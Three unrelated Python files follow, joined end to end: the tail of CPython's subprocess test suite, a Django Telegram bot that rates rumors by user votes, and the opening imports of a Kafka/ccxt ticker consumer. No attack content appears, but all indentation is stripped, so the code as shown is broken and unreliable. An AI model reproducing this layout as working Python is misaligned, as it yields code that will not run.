self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
            # The pure Python implementation keeps the original message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
        # +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
        # Leave two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
        # give the process some time to exit, then create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
executable_list = "exec" # error: must be a sequence
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, [], cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
        # We use hardcoded constants because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
        # Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class CommandTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = set(("list2cmdline",))
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(FileNotFoundError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
CommandTests,
ProcessTestCaseNoPoll,
CommandsWithSpaces,
ContextManagerTests,
RunFuncTestCase,
)
support.run_unittest(*unit_tests)
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
telegram.py
|
import io
import json
import time
import telebot
from django.conf import settings
from django.db.models import F
from django.utils.translation import gettext as _
from redis import Redis
from telebot import types
from telebot.handler_backends import RedisHandlerBackend
from telebot.types import Update
from bots.decorators import bot_respects_user_language
from rumors.models import (
Image,
Review,
Text,
TRUTHFULNESS_POINTS_LIE_IS_LESS_THAN_VALUE,
TRUTHFULNESS_POINTS_TRUTH_IS_GREATER_THAN_VALUE,
)
from rumors.utils import get_image_hash, process_image_hash, process_text
redis = Redis.from_url(settings.REDIS_URL)
__redis_handler = RedisHandlerBackend()
__redis_handler.redis = redis
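# A Redis-backed handler backend keeps register_next_step_handler state outside the process,
# so pending conversation steps survive restarts and can be shared between workers.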
bot = telebot.TeleBot(
settings.TELEGRAM_BOT_TOKEN,
next_step_backend=__redis_handler
)
@bot.message_handler(commands=['help', 'start'])
@bot_respects_user_language
def send_welcome(message):
bot.reply_to(
message=message,
text=_(
"Hi there, I am Veridical BOT.\n"
"I am here to eliminate the rumors around you. 😌\n"
"If you send or forward a message or an image to me, "
"I will check if it is a rumor based on the data I have collected. \n"
"you can also vote on the validity of the judgment I provide. \n"
"This way you'll be able to help build a world with no rumors! ❤️"
),
)
def validate_points(message, content, content_type):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(_('cancel'), _("vote"))
if 0 < content.truthfulness_points <= TRUTHFULNESS_POINTS_TRUTH_IS_GREATER_THAN_VALUE:
bot.reply_to(
message,
_(
"we're still not sure about this, some people say it's true,"
" but we're not confident about this information yet."
)
)
elif content.truthfulness_points == 0:
bot.reply_to(
message,
_(
"We have no information about the truthfulness of this {content_type},"
" so we classify it as unknown."
).format(content_type=_(content_type))
)
elif content.truthfulness_points < TRUTHFULNESS_POINTS_LIE_IS_LESS_THAN_VALUE:
bot.reply_to(
message,
_("Our data set shows that this {content_type} has"
" no truthfulness, hence it's a rumor.").format(content_type=_(content_type))
)
elif content.truthfulness_points > TRUTHFULNESS_POINTS_TRUTH_IS_GREATER_THAN_VALUE:
bot.reply_to(
message,
_("Our data set shows that this {content_type} is truthful,"
" hence it's not a rumor.").format(content_type=_(content_type))
)
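    # Note: depending on the threshold constants, negative point values that are not below
    # TRUTHFULNESS_POINTS_LIE_IS_LESS_THAN_VALUE match none of the branches above, so no verdict
    # message is sent for them; only the vote prompt below goes out.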
msg = bot.send_message(
chat_id=message.chat.id,
text=_('if you wish to vote on the validity of this {content_type},'
' choose "vote".').format(content_type=_(content_type)),
reply_markup=markup,
)
bot.register_next_step_handler(msg, process_option_step, content_type=content_type)
@bot.message_handler(func=lambda message: True, content_types=['text'])
@bot_respects_user_language
def check_text(message):
chat_id = message.chat.id
    text, _unused = process_text(message.text)  # don't shadow the gettext alias "_"
redis.set(name=str(chat_id) + 'text', value=str(text.id), ex=7200)
validate_points(message, text, 'text')
@bot.message_handler(func=lambda message: True, content_types=['photo'])
@bot_respects_user_language
def check_image(message):
file_path = bot.get_file(message.photo[-1].file_id).file_path
chat_id = message.chat.id
downloaded_img = bot.download_file(file_path)
    image_file = io.BytesIO(downloaded_img)
    img_hash = get_image_hash(image_file)
ids, image = process_image_hash(img_hash)
redis.set(name=str(chat_id) + 'ids', value=json.dumps(ids), ex=7200)
redis.set(name=str(chat_id) + 'image', value=str(image.id), ex=7200)
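    # Both the matching image ids and the canonical image id are cached in Redis for two hours
    # (ex=7200) so the later vote step can update every record that shares this image hash.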
validate_points(message, image, 'image')
@bot_respects_user_language
def process_option_step(message, content_type):
from django.utils.translation import gettext as _
markup = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)
markup.add(_('Lies'), _('Truth'))
try:
chat_id = message.chat.id
option = message.text
if option in [_("vote"), _(u'cancel')]:
if option == _("vote"):
msg = bot.reply_to(
message,
_(
"choose 'Truth' if you think that the {content_type} is truthful,"
" or choose 'Lies' if you think it's a rumor. 🧐"
).format(content_type=_(content_type)),
reply_markup=markup
)
bot.register_next_step_handler(msg, process_vote, content_type=content_type)
elif option == _('cancel'):
markup = types.ReplyKeyboardRemove(selective=False)
bot.reply_to(message, _('Thank you for using Veridical!'), reply_markup=markup)
bot.clear_step_handler_by_chat_id(chat_id)
else:
raise Exception()
except Exception as e:
bot.reply_to(message, _('oooops, we had an error processing your request.'), reply_markup=markup)
@bot_respects_user_language
def process_vote(message, content_type):
from django.utils.translation import gettext as _
markup = types.ReplyKeyboardRemove(selective=False)
try:
chat_id = message.chat.id
option = message.text
content_id = redis.get(str(chat_id) + content_type)
if content_type == 'image':
model = Image
ids = json.loads(redis.get(str(chat_id) + 'ids'))
elif content_type == 'text':
ids = [content_id.decode()]
model = Text
else:
raise Exception()
content = model.objects.filter(id=content_id.decode()).first()
if option in [_("Truth"), _("Lies")]:
if Review.objects.filter(object_id__in=ids, chat_id=chat_id).exists():
bot.reply_to(
message,
_(
"it seems like you've voted on this {content_type} before,"
" you can only vote on an {content_type} once. 🧐"
).format(content_type=_(content_type)),
reply_markup=markup
)
bot.clear_step_handler_by_chat_id(chat_id)
return
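            # Each vote stores a Review row and shifts truthfulness_points on every matching row
            # with an F() expression, so the counter update happens atomically in the database.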
if option == _("Truth"):
content.reviews.create(is_truthful=True, chat_id=chat_id)
model.objects.filter(pk__in=ids).update(truthfulness_points=F('truthfulness_points') + 1)
elif option == _("Lies"):
content.reviews.create(is_truthful=False, chat_id=chat_id)
model.objects.filter(pk__in=ids).update(truthfulness_points=F('truthfulness_points') - 1)
bot.reply_to(
message,
_(
"Thank you for voting on this!"
),
reply_markup=markup
)
bot.clear_step_handler_by_chat_id(chat_id)
else:
raise Exception()
except Exception as e:
bot.reply_to(message, _('oooops, we had an error processing your request.'), reply_markup=markup)
bot.clear_step_handler_by_chat_id(message.chat.id)
def process_request_body(string: str) -> Update:
    update = telebot.types.Update.de_json(string)
    bot.process_new_updates([update])
    return update
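# Startup mode: with TELEGRAM_BOT_POLLING set, the bot long-polls Telegram from a background
# thread (handy for local development); otherwise it registers a webhook, and each raw update
# is presumably handed to process_request_body() by the web endpoint behind that URL.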
if settings.TELEGRAM_BOT_POLLING:
bot.remove_webhook()
time.sleep(0.1)
import threading
threading.Thread(target=bot.polling, kwargs={"none_stop": True}).start()
else:
bot.remove_webhook()
time.sleep(0.1)
bot.set_webhook(url='https://veridical.herokuapp.com/v1/bots/telegram/' + settings.TELEGRAM_BOT_TOKEN)
|
tickerRequestConsumer.py
|
#!/usr/bin/python
import threading
import time
import traceback
import confluent_kafka
import ccxt
import json
import datetime
import logging
import os
import click
import uuid
import signal
import queue
import collections
import etcd3
import simpleProducer
import simpleConsumer
import heartbeatProducer
import configurationService
from ccxtRequestProcessor import CcxtRequestProcessor
logging.basicConfig(
#level=logging.DEBUG,
level=logging.INFO,
format='%(asctime)s - %(threadName)s - %(name)s - %(levelname)s - %(message)s')
REQUEST_MARKET_DATA_TOPIC = "RequestMarketData"
RESULT_MARKET_DATA_TOPIC = "ResultMarketData"
STATUS_TOPIC = "StatusMarketData"
PROCESSOR_TYPE = "TickerRequestConsumer"
STOP_THREADS = threading.Event()
